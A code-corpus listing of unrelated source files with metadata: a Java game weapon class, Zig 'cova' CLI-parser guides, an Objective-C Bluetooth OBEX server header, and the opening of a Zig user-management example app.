import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class Whip extends MeleeWeapon {
{
image = ItemSpriteSheet.WHIP;
tier = 3;
RCH = 3; //lots of extra reach
}
@Override
public int max(int lvl) {
return 3*(tier+1) + //12 base, down from 20
lvl*(tier); //+3 per level, down from +4
}
}
| 1,198 | Whip | java | en | java | code | {"qsc_code_num_words": 173, "qsc_code_num_chars": 1198.0, "qsc_code_mean_word_length": 4.99421965, "qsc_code_frac_words_unique": 0.64739884, "qsc_code_frac_chars_top_2grams": 0.03819444, "qsc_code_frac_chars_top_3grams": 0.04513889, "qsc_code_frac_chars_top_4grams": 0.06597222, "qsc_code_frac_chars_dupe_5grams": 0.09490741, "qsc_code_frac_chars_dupe_6grams": 0.06481481, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.028125, "qsc_code_frac_chars_whitespace": 0.19866444, "qsc_code_size_file_byte": 1198.0, "qsc_code_num_lines": 40.0, "qsc_code_num_chars_line_max": 73.0, "qsc_code_num_chars_line_mean": 29.95, "qsc_code_frac_chars_alphabet": 0.871875, "qsc_code_frac_chars_comments": 0.71202003, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.07142857, "qsc_codejava_score_lines_no_logic": 0.21428571, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00JCIV00/cova | docs/guides/arg_types/option.md | # Option
An Option (also known as a Flag) is an Argument Type which wraps a Value and is typically optional. They should be used for Values that an end user is not always expected to provide. Additionally, unlike Values, they can be expected in any order since they are set by name.
## Configuring an Option Type
Similar to Commands, an Option Type should be configured before any Options are created. Fortunately, the process is virtually the same as with Command Types and both configurations are designed to be done simultaneously. The standard way to configure an Option Type is by configuring the `cova.Command.Config.opt_config` field during Command Type configuration. This field is a `cova.Option.Config` and works effectively the same way as its Command counterpart. If the field is not configured it will be set to the default configuration. Done this way, the Option Type will be a part of the Command Type and will have access to all of the respective functions and methods within `cova.Option.Custom`().
## Setting up an Option
The most straightforward way to set up an Option is to simply use Zig's standard syntax for filling out a struct. More specifically, Options can bet set up within the `cova.Command.Custom.opts` field of a Command using Anonymous Struct (or Tuple) syntax. Similarly, an Option's internal Value can also be set up this way via the Option's `val` field.
Alternatively, Options will be created automatically when using `cova.Command.Custom.from`().
## Additional Info
An Option must have a Short Name (ex: `-h`), a Long Name (ex: `--name "Lilly"`), or both. The prefixes for both Short and Long names are set by the library user during a normal setup. If the wrapped Value of an Option has a Boolean Type it will default to `false` and can be set to `true` using the Option without a following argument token from the end user (ex: `-t` or `--toggle`). They also provide `usage()` and `help()` methods similar to Commands.
## Example:
```zig
// Within a Command
...
.opts = &.{
.{
.name = "string_opt",
.description = "A string option.",
.short_name = 's',
.long_name = "string",
.val = ValueT.ofType([]const u8, .{
.name = "stringVal",
.description = "A string value.",
}),
},
.{
.name = "int_opt",
.description = "An integer option.",
.short_name = 'i',
.long_name = "int",
.val = ValueT.ofType(i16, .{
.name = "int_opt_val",
.description = "An integer option value.",
.val_fn = struct{ fn valFn(int: i16) bool { return int < 666; } }.valFn
}),
},
},
```
| 2,671 | option | md | en | markdown | text | {"qsc_doc_frac_chars_curly_bracket": 0.00524148, "qsc_doc_frac_words_redpajama_stop": 0.32092199, "qsc_doc_num_sentences": 50.0, "qsc_doc_num_words": 406, "qsc_doc_num_chars": 2671.0, "qsc_doc_num_lines": 42.0, "qsc_doc_mean_word_length": 4.5270936, "qsc_doc_frac_words_full_bracket": 0.0, "qsc_doc_frac_lines_end_with_readmore": 0.02380952, "qsc_doc_frac_lines_start_with_bullet": 0.0, "qsc_doc_frac_words_unique": 0.39162562, "qsc_doc_entropy_unigram": 4.66120338, "qsc_doc_frac_words_all_caps": 0.0035461, "qsc_doc_frac_lines_dupe_lines": 0.18918919, "qsc_doc_frac_chars_dupe_lines": 0.00651201, "qsc_doc_frac_chars_top_2grams": 0.03917301, "qsc_doc_frac_chars_top_3grams": 0.01958651, "qsc_doc_frac_chars_top_4grams": 0.02829162, "qsc_doc_frac_chars_dupe_5grams": 0.0, "qsc_doc_frac_chars_dupe_6grams": 0.0, "qsc_doc_frac_chars_dupe_7grams": 0.0, "qsc_doc_frac_chars_dupe_8grams": 0.0, "qsc_doc_frac_chars_dupe_9grams": 0.0, "qsc_doc_frac_chars_dupe_10grams": 0.0, "qsc_doc_frac_chars_replacement_symbols": 0.0, "qsc_doc_cate_code_related_file_name": 0.0, "qsc_doc_num_chars_sentence_length_mean": 24.69230769, "qsc_doc_frac_chars_hyperlink_html_tag": 0.0, "qsc_doc_frac_chars_alphabet": 0.87896254, "qsc_doc_frac_chars_digital": 0.00384246, "qsc_doc_frac_chars_whitespace": 0.22051666, "qsc_doc_frac_chars_hex_words": 0.0} | 1 | {"qsc_doc_frac_chars_replacement_symbols": 0, "qsc_doc_entropy_unigram": 0, "qsc_doc_frac_chars_top_2grams": 0, "qsc_doc_frac_chars_top_3grams": 0, "qsc_doc_frac_chars_top_4grams": 0, "qsc_doc_frac_chars_dupe_5grams": 0, "qsc_doc_frac_chars_dupe_6grams": 0, "qsc_doc_frac_chars_dupe_7grams": 0, "qsc_doc_frac_chars_dupe_8grams": 0, "qsc_doc_frac_chars_dupe_9grams": 0, "qsc_doc_frac_chars_dupe_10grams": 0, "qsc_doc_frac_chars_dupe_lines": 0, "qsc_doc_frac_lines_dupe_lines": 0, "qsc_doc_frac_lines_end_with_readmore": 0, "qsc_doc_frac_lines_start_with_bullet": 0, "qsc_doc_frac_words_all_caps": 0, "qsc_doc_mean_word_length": 0, "qsc_doc_num_chars": 0, "qsc_doc_num_lines": 0, "qsc_doc_num_sentences": 0, "qsc_doc_num_words": 0, "qsc_doc_frac_chars_hex_words": 0, "qsc_doc_frac_chars_hyperlink_html_tag": 0, "qsc_doc_frac_chars_alphabet": 0, "qsc_doc_frac_chars_digital": 0, "qsc_doc_frac_chars_whitespace": 0} |
00JCIV00/cova | docs/guides/arg_types/arg_types.md | # Overview
Cova is based on the idea that Arguments will fall into one of three types: Commands, Options, or Values. These types are assembled into a single Command struct which is then used to parse argument tokens.
## Argument Types
### Command
A Command is a container Argument for sub Commands, Options, and Values. It can contain any mix of those Arguments or none at all if it's to be used as a standalone command (for instance `covademo help`). The [`checkCmd()`](`cova.Command.Custom.checkCmd`) A HashMap<Name, Value/Option> for Options or Values can be created using either the `getOpts()` or `getVals()` method. Usage and Help statements for a Command can also be generated using the `usage()` and `help()` methods respectively.
#### Example:
```zig
const cmd = try alloc.create(Command);
cmd.* = .{
.name = "covademo",
.help_prefix = "CovaDemo",
.description = "A demo of the Cova command line argument parser.",
.sub_cmds = subCmdsSetup: {
var setup_cmds = [_]*const Command{
&Command{
.name = "help",
.help_prefix = "CovaDemo",
.description = "Show the CovaDemo help display.",
},
&Command{
.name = "usage",
.help_prefix = "CovaDemo",
.description = "Show the CovaDemo usage display.",
},
};
break :subCmdsSetup setup_cmds[0..];
},
.opts = { ... },
.vals = { ... }
}
defer alloc.destroy(cmd);
```
### Option
An Option is an Argument which wraps a Value and is ALWAYS optional. It may have a Short Name (ex: `-h`), a Long Name (ex: `--name "Lilly"`), or both. The prefixes for both Short and Long names can be set by the library user. If the wrapped Value has a Boolean type it will default to False and can be set to True using the Option without a following Argument (ex: `-t` or `--toggle`). They also provide `usage()` and `help()` methods similar to Commands.
#### Example:
```zig
.opts = optsSetup: {
var setup_opts = [_]*const Option{
&Option{
.name = "stringOpt",
.short_name = 's',
.long_name = "stringOpt",
.val = &Value.init([]const u8, .{
.name = "stringVal",
.description = "A string value.",
}),
.description = "A string option.",
},
&Option{
.name = "intOpt",
.short_name = 'i',
.long_name = "intOpt",
.val = &Value.init(i16, .{
.name = "intVal",
.description = "An integer value.",
.val_fn = struct{ fn valFn(int: i16) bool { return int < 666; } }.valFn
}),
.description = "An integer option.",
},
&Option{
.name = "help",
.short_name = 'h',
.long_name = "help",
.val = &Value.init(bool, .{
.name = "helpFlag",
.description = "Flag for help!",
}),
.description = "Show the CovaDemo help display.",
},
};
break :optsSetup setup_opts[0..];
},
```
### Value
A Value (also known as a Positional Argument) is an Argument that is expected in a specific order and should be interpreted as a specific type. The full list of available types can be seen in `src/Value.zig/Generic`, but the basics are Boolean, String (`[]const u8`), Integer (`u/i##`), or Float (`f##`). A Value will be parsed to its corresponding type and can be retrieved using `get()`. They can also be given a Default value using the `.default_val` field and a Validation Function using the `.val_fn` field.
#### Example:
```zig
.vals = valsSetup: {
var setup_vals = [_]*const Value.Generic{
&Value.init([]const u8, .{
.name = "cmdStr",
.description = "A string value for the command.",
}),
&Value.init(u128, .{
.name = "cmd_u128",
.description = "A u128 value for the command.",
// Default Value
.default_val = 654321,
// Validation Function
.val_fn = struct{ fn valFn(val: u128) bool { return val > 123456 and val < 987654; } }.valFn,
}),
};
break :valsSetup setup_vals[0..];
}
```
### Parsing
Parsing is handled by the `parseArgs()` function in cova.zig. It takes in an ArgIterator, a Command, and a Writer, then parses each token sequentially. The results of a successful parse are stored in the provided Command which can then be analyzed by the user.
#### Example:
```zig
pub fn main() !void {
// Parse Arguments
var arena = std.heap.ArenaAllocator.init(std.heap.page_allocator);
defer arena.deinit();
const alloc = arena.allocator();
const cmd = try alloc.create(Command);
cmd.* = .{ ... };
defer alloc.destroy(cmd);
const args = try proc.argsWithAllocator(alloc);
try cova.parseArgs(&args, cmd, stdout);
// Analyze Data
// - Check for the "help" Sub Command and run its help() method
if (cmd.sub_cmd != null and std.mem.eql(u8, cmd.sub_cmd.?.name, "help")) try cmd.help(stdout);
// - Get a HashMap of the Command's Options
if (cmd.opts != null) {
var opt_map: StringHashMap(*const Option) = try cmd.getOpts(alloc);
defer opt_map.deinit();
}
// - Print out all of the Command's Values
for (cmd.vals orelse return) |val| {
switch (meta.activeTag(val.*)) {
.string => {
std.debug.print(" Val: {?s}, Data: {s}\n", .{
val.name(),
val.string.get() catch "",
});
},
inline else => |tag| {
std.debug.print(" Val: {?s}, Data: {any}\n", .{
val.name(),
@field(val, @tagName(tag)).get() catch null,
});
},
}
}
}
```
| 5,938 | arg_types | md | en | markdown | text | {"qsc_doc_frac_chars_curly_bracket": 0.01212529, "qsc_doc_frac_words_redpajama_stop": 0.20588235, "qsc_doc_num_sentences": 128.0, "qsc_doc_num_words": 731, "qsc_doc_num_chars": 5938.0, "qsc_doc_num_lines": 143.0, "qsc_doc_mean_word_length": 4.55813953, "qsc_doc_frac_words_full_bracket": 0.0, "qsc_doc_frac_lines_end_with_readmore": 0.0, "qsc_doc_frac_lines_start_with_bullet": 0.0, "qsc_doc_frac_words_unique": 0.32147743, "qsc_doc_entropy_unigram": 4.95466587, "qsc_doc_frac_words_all_caps": 0.00816993, "qsc_doc_frac_lines_dupe_lines": 0.40441176, "qsc_doc_frac_chars_dupe_lines": 0.11215933, "qsc_doc_frac_chars_top_2grams": 0.007503, "qsc_doc_frac_chars_top_3grams": 0.01080432, "qsc_doc_frac_chars_top_4grams": 0.02611044, "qsc_doc_frac_chars_dupe_5grams": 0.09543818, "qsc_doc_frac_chars_dupe_6grams": 0.07262905, "qsc_doc_frac_chars_dupe_7grams": 0.04561825, "qsc_doc_frac_chars_dupe_8grams": 0.0, "qsc_doc_frac_chars_dupe_9grams": 0.0, "qsc_doc_frac_chars_dupe_10grams": 0.0, "qsc_doc_frac_chars_replacement_symbols": 0.0, "qsc_doc_cate_code_related_file_name": 0.0, "qsc_doc_num_chars_sentence_length_mean": 18.9295302, "qsc_doc_frac_chars_hyperlink_html_tag": 0.00336814, "qsc_doc_frac_chars_alphabet": 0.79516324, "qsc_doc_frac_chars_digital": 0.01064087, "qsc_doc_frac_chars_whitespace": 0.30363759, "qsc_doc_frac_chars_hex_words": 0.0} | 1 | {"qsc_doc_frac_chars_replacement_symbols": 0, "qsc_doc_entropy_unigram": 0, "qsc_doc_frac_chars_top_2grams": 0, "qsc_doc_frac_chars_top_3grams": 0, "qsc_doc_frac_chars_top_4grams": 0, "qsc_doc_frac_chars_dupe_5grams": 0, "qsc_doc_frac_chars_dupe_6grams": 0, "qsc_doc_frac_chars_dupe_7grams": 0, "qsc_doc_frac_chars_dupe_8grams": 0, "qsc_doc_frac_chars_dupe_9grams": 0, "qsc_doc_frac_chars_dupe_10grams": 0, "qsc_doc_frac_chars_dupe_lines": 0, "qsc_doc_frac_lines_dupe_lines": 0, "qsc_doc_frac_lines_end_with_readmore": 0, "qsc_doc_frac_lines_start_with_bullet": 0, "qsc_doc_frac_words_all_caps": 0, "qsc_doc_mean_word_length": 0, "qsc_doc_num_chars": 0, "qsc_doc_num_lines": 0, "qsc_doc_num_sentences": 0, "qsc_doc_num_words": 0, "qsc_doc_frac_chars_hex_words": 0, "qsc_doc_frac_chars_hyperlink_html_tag": 0, "qsc_doc_frac_chars_alphabet": 0, "qsc_doc_frac_chars_digital": 0, "qsc_doc_frac_chars_whitespace": 0} |
0-1-0/lightblue-0.4 | src/mac/LightAquaBlue/BBBluetoothOBEXServer.h | /*
* Copyright (c) 2009 Bea Lam. All rights reserved.
*
* This file is part of LightBlue.
*
* LightBlue is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* LightBlue is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with LightBlue. If not, see <http://www.gnu.org/licenses/>.
*/
//
// BBBluetoothOBEXServer.h
// LightAquaBlue
//
// Implements the server side of an OBEX session over a Bluetooth transport.
//
// Generally you will use BBBluetoothOBEXServer like this:
// 1. Call registerForChannelOpenNotifications:selector:withChannelID:direction:
// in the IOBluetoothRFCOMMChannel class in order be notified whenever
// you receive a client connection on a particular RFCOMM channel ID.
// 2. When you are notified that a client has connected, use the provided
// IOBluetoothRFCOMMChannel to create a a BBBluetoothOBEXServer
// object, and then call run: on the object to start the server.
//
// There is an example in examples/LightAquaBlue/SimpleOBEXServer that shows
// how to use this class to run a basic OBEX server session.
//
#import <Cocoa/Cocoa.h>
#import <IOBluetooth/OBEX.h>
@class OBEXSession;
@class BBOBEXHeaderSet;
@class BBMutableOBEXHeaderSet;
@class BBOBEXRequestHandler;
@class IOBluetoothRFCOMMChannel;
@class IOBluetoothUserNotification;
@interface BBBluetoothOBEXServer : NSObject {
IOBluetoothRFCOMMChannel *mChannel;
OBEXSession *mSession;
id mDelegate;
BBOBEXRequestHandler *mCurrentRequestHandler;
IOBluetoothUserNotification *mChannelNotif;
}
/*
* Creates and returns a BBBluetoothOBEXServer.
*/
+ (id)serverWithIncomingRFCOMMChannel:(IOBluetoothRFCOMMChannel *)channel
delegate:(id)delegate;
/*
* Initialises a BBBluetoothOBEXServer that will run on the given <channel>.
* The <delegate> will be notified when events occur on the server.
*/
- (id)initWithIncomingRFCOMMChannel:(IOBluetoothRFCOMMChannel *)channel
delegate:(id)delegate;
/*
* Starts the server. The server will now receive and process client requests.
*/
- (void)run;
/*
* Closes the server. It cannot be started again after this.
*/
- (void)close;
/*
* Sets <responseCode> to be the next response code to be sent for the current
* request.
*
* Available response codes are listed in the OBEXOpCodeResponseValues enum in
* <IOBluetooth/OBEX.h>. (Use the codes that end with "WithFinalBit".) For
* example, you could set the response code to
* kOBEXResponseCodeNotFoundWithFinalBit if a client requests a non-existent
* file.
*/
- (void)setResponseCodeForCurrentRequest:(int)responseCode;
/*
* Adds <responseHeaders> to the next response headers to be sent for the
* current request.
*
* For example, OBEX servers commonly include a "Length" header when
* responding to a Get request to indicate the size of the file to be
* transferred.
*/
- (void)addResponseHeadersForCurrentRequest:(BBOBEXHeaderSet *)responseHeaders;
/*
* Sets the server's delegate to <delegate>.
*/
- (void)setDelegate:(id)delegate;
/*
* Returns the delegate for this server.
*/
- (id)delegate;
/*
* Sets whether debug messages should be displayed (default is NO).
*/
+ (void)setDebug:(BOOL)debug;
@end
/*
* This informal protocol describes the methods that can be implemented for a
* BBBluetoothOBEXServer delegate.
*
* For each type of client request, there is a "...shouldHandle..." method
* (e.g. server:shouldHandleConnectRequest:) that is called when the request
* is received. If the delegate does not implement this method for a
* particular type of request, the server will automatically refuse all
* requests of this type with a "Not Implemented" response.
*/
@protocol BBBluetoothOBEXServerDelegate
/*
* Called when an error occurs on the server. <error> is an error code from
* <IOBluetooth/OBEX.h> and <description> is a description of the error.
*/
- (void)server:(BBBluetoothOBEXServer *)server
errorOccurred:(OBEXError)error
description:(NSString *)description;
/*
* Called when a Connect request is received with the specified <requestHeaders>.
*
* This should return YES if the request should be allowed to continue, or NO
* if the request should be refused. (By default, a request will be refused
* with a 'Forbidden' response; call setResponseCodeForCurrentRequest: to set
* a more specific response.)
*/
- (BOOL)server:(BBBluetoothOBEXServer *)server
shouldHandleConnectRequest:(BBOBEXHeaderSet *)requestHeaders;
/*
* Called when the server finishes processing of a Connect request.
*/
- (void)serverDidHandleConnectRequest:(BBBluetoothOBEXServer *)server;
/*
* Called when a Disconnect request is received with the specified <requestHeaders>.
*
* This should return YES if the request should be allowed to continue, or NO
* if the request should be refused. (By default, a request will be refused
* with a 'Forbidden' response; call setResponseCodeForCurrentRequest: to set
* a more specific response.)
*/
- (BOOL)server:(BBBluetoothOBEXServer *)server
shouldHandleDisconnectRequest:(BBOBEXHeaderSet *)requestHeaders;
/*
* Called when the server finishes processing of a Disconnect request.
*/
- (void)serverDidHandleDisconnectRequest:(BBBluetoothOBEXServer *)server;
/*
* Called when a Put request is received with the specified <requestHeaders>.
*
* This should return an opened NSOutputStream if the request should be allowed
* to continue, or nil if the request should be refused. (By default, a request
* will be refused with a 'Forbidden' response; call
* setResponseCodeForCurrentRequest: to set a more specific response.)
*
* Note the returned stream *must* be open, or the request will fail.
*/
- (NSOutputStream *)server:(BBBluetoothOBEXServer *)server
shouldHandlePutRequest:(BBOBEXHeaderSet *)requestHeaders;
/*
* Called each time a chunk of data is received during a Put request.
* The <length> indicates the number of bytes received, and <isLastPacket> is
* set to YES if all the data has now been received and the server is about to
* send the final response for the request.
*/
- (void)server:(BBBluetoothOBEXServer *)server
didReceiveDataOfLength:(unsigned)length
isLastPacket:(BOOL)isLastPacket;
/*
* Called when the server finishes processing of a Put request. The
* <outputStream> is the stream originally provided from
* server:shouldHandlePutRequest: and <aborted> is set to YES if the client
* sent an Abort request to cancel the Put request before it was completed.
*/
- (void)server:(BBBluetoothOBEXServer *)server
didHandlePutRequestForStream:(NSOutputStream *)outputStream
requestWasAborted:(BOOL)aborted;
/*
* Called when a Put-Delete request is received with the specified <requestHeaders>.
*
* This should return YES if the request should be allowed to continue, or NO
* if the request should be refused. (By default, a request will be refused
* with a 'Forbidden' response; call setResponseCodeForCurrentRequest: to set
* a more specific response.)
*/
- (BOOL)server:(BBBluetoothOBEXServer *)server
shouldHandlePutDeleteRequest:(BBOBEXHeaderSet *)requestHeaders;
/*
* Called when the server finishes processing of a Put-Delete request.
*/
- (void)serverDidHandlePutDeleteRequest:(BBBluetoothOBEXServer *)server;
/*
* Called when a Get request is received with the specified <requestHeaders>.
*
* This should return an opened NSInputStream if the request should be allowed
* to continue, or nil if the request should be refused. (By default, a request
* will be refused with a 'Forbidden' response; call
* setResponseCodeForCurrentRequest: to set a more specific response.)
*
* Note the returned stream *must* be open, or the request will fail.
*/
- (NSInputStream *)server:(BBBluetoothOBEXServer *)server
shouldHandleGetRequest:(BBOBEXHeaderSet *)requestHeaders;
/*
* Called each time a chunk of data is sent during a Get request.
* The <length> indicates the number of bytes sent.
*/
- (void)server:(BBBluetoothOBEXServer *)server
didSendDataOfLength:(unsigned)length;
/*
* Called when the server finishes processing of a Get request. The
* <outputStream> is the stream originally provided from
* server:shouldHandleGetRequest: and <aborted> is set to YES if the client
* sent an Abort request to cancel the Get request before it was completed.
*/
- (void)server:(BBBluetoothOBEXServer *)server
didHandleGetRequestForStream:(NSInputStream *)inputStream
requestWasAborted:(BOOL)aborted;
/*
* Called when a SetPath request is received with the specified <requestHeaders>
* and SetPath <flags>. The first two bits of the flags are significant
* for the SetPath operation:
* - Bit 0 is set if the server should back up one level (i.e. "..")
* before applying the requested path name
* - Bit 1 is set if the server should respond with an error instead of
* creating a directory if the specified directory does not exist
*
* This should return YES if the request should be allowed to continue, or NO
* if the request should be refused. (By default, a request will be refused
* with a 'Forbidden' response; call setResponseCodeForCurrentRequest: to set
* a more specific response.)
*/
- (BOOL)server:(BBBluetoothOBEXServer *)server
shouldHandleSetPathRequest:(BBOBEXHeaderSet *)requestHeaders
withFlags:(OBEXFlags)flags;
/*
* Called when the server finishes processing of a SetPath request.
*/
- (void)serverDidHandleSetPathRequest:(BBBluetoothOBEXServer *)server;
@end
| 9,992 | BBBluetoothOBEXServer | h | en | c | code | {"qsc_code_num_words": 1234, "qsc_code_num_chars": 9992.0, "qsc_code_mean_word_length": 6.07779579, "qsc_code_frac_words_unique": 0.25850891, "qsc_code_frac_chars_top_2grams": 0.0216, "qsc_code_frac_chars_top_3grams": 0.0192, "qsc_code_frac_chars_top_4grams": 0.0288, "qsc_code_frac_chars_dupe_5grams": 0.41773333, "qsc_code_frac_chars_dupe_6grams": 0.3844, "qsc_code_frac_chars_dupe_7grams": 0.36066667, "qsc_code_frac_chars_dupe_8grams": 0.34693333, "qsc_code_frac_chars_dupe_9grams": 0.32533333, "qsc_code_frac_chars_dupe_10grams": 0.30213333, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00108696, "qsc_code_frac_chars_whitespace": 0.17133707, "qsc_code_size_file_byte": 9992.0, "qsc_code_num_lines": 277.0, "qsc_code_num_chars_line_max": 85.0, "qsc_code_num_chars_line_mean": 36.07220217, "qsc_code_frac_chars_alphabet": 0.90471014, "qsc_code_frac_chars_comments": 0.73108487, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.25, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codec_frac_lines_func_ratio": 0.0, "qsc_codec_cate_bitsstdc": 0.0, "qsc_codec_nums_lines_main": 0, "qsc_codec_frac_lines_goto": 0.0, "qsc_codec_cate_var_zero": 0.0, "qsc_codec_score_lines_no_logic": 0.0, "qsc_codec_frac_lines_print": 0.0, "qsc_codec_frac_lines_preprocessor_directives": null} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codec_frac_lines_func_ratio": 0, "qsc_codec_nums_lines_main": 0, "qsc_codec_score_lines_no_logic": 0, "qsc_codec_frac_lines_preprocessor_directives": 0, "qsc_codec_frac_lines_print": 0} |
00JCIV00/cova | examples/basic_app.zig | //! This is a basic user management application designed to highlight key features of the Cova library.
//! Please note that the comments below only cover how to use the Cova library, so there are many
//! undocumented blocks.
const builtin = @import("builtin");
const std = @import("std");
const ArrayList = std.ArrayList;
const MultiArrayList = std.MultiArrayList;
const cova = @import("cova");
// Setup
// - Types
// A custom Command Type should be set up for any project using Cova. The easiest way to do this
// is to simply use `cova.Command.BaseCommand()` which will provide a Command Type with default
// values. However, customization via `cova.Command.Custom()` and configuration of the provided
// `cova.Command.Config` will create a Command Type that's more tailored to a project.
// The most basic example of this is simply adding a title to the help page as seen below.
pub const CommandT = cova.Command.Custom(.{
.global_help_prefix = "Basic User Management App", // This will appear at the top of Usage/Help.
});
// Customized Option and Value Types can also be created via their respective `from()` functions
// and `Config` structs. The `Config` structs can be provided directly to the `cova.Command.Config`
// that's configured above so that the Types are created within the Command Type. This is the
// preferred way to set up these Argument Types and allows them to be referenced as seen below.
pub const OptionT = CommandT.OptionT;
pub const ValueT = CommandT.ValueT;
// - Main Command
// Cova is designed on the principle of 'Comptime Setup. Runtime Use.' All this means is that
// Commands and their corresponding Options and Values will be declared and set up during Comptime,
// then initialized with an allocator for parsing and analysis during Runtime.
//
// For Comptime Setup, a `setup_cmd` should be created. This is the Comptime version of the main
// command for the app, which can be thought of as the main menu. The example below is also an
// example of how Commands are declared when they aren't created by converting from a Struct,
// Union, or Function. Notably, Commands can easily be nested via the `sub_cmds` field.
pub const setup_cmd: CommandT = .{
.name = "basic-app",
.description = "A basic user management application designed to highlight key features of the Cova library.",
// Argument Groups are an easy way to organize Arguments for Usage/Help, Parsing, and Analysis.
// They can be created for Command, Options, Values separately.
.cmd_groups = &.{ "INTERACT", "VIEW" },
.sub_cmds = &.{
// A Command created from a Struct. (Details further down).
CommandT.from(User, .{
.cmd_name = "new",
.cmd_description = "Add a new user.",
// Examples can be added for Commands to be shown in Help Messages
// and Generated Help Docs.
.cmd_examples = &.{ "basic-app new -f Bruce -l Wayne -a 40 -p \"555 555 5555\" -A \" 1007 Mountain Drive, Gotham\" true" },
.cmd_group = "INTERACT",
// Descriptions can be added for Options and Values of Struct or Union conversions as
// seen here.
.sub_descriptions = &.{
.{ "is_admin", "Add this user as an admin?" },
.{ "first_name", "User's First Name." },
.{ "last_name", "User's Last Name." },
.{ "age", "User's Age." },
.{ "phone", "User's Phone #." },
.{ "address", "User's Address." },
},
}),
// A Command created from a Function. (Details further down).
CommandT.from(@TypeOf(open), .{
.cmd_name = "open",
.cmd_description = "Open or create a users file.",
.cmd_examples = &.{ "basic-app open users.csv" },
.cmd_group = "INTERACT",
}),
// A "raw" Command, same as the parent `setup_cmd`.
CommandT{
.name = "list",
.description = "List all current users.",
.cmd_group = "VIEW",
.sub_cmds_mandatory = false,
.sub_cmds = &.{
// A Command created from a Union. (Details further down).
CommandT.from(Filter, .{
.cmd_name = "filter",
.cmd_description = "List all current users matching the provided filter. Filters can be exactly ONE of any user field.",
}),
},
},
// Another "raw" Command example w/ a "raw" Option as well.
CommandT{
.name = "clean",
.description = "Clean (delete) the default users file (users.csv) and persistent variable file (.ba_persist).",
.examples = &.{
"basic-app clean",
"basic-app delete --file users.csv"
},
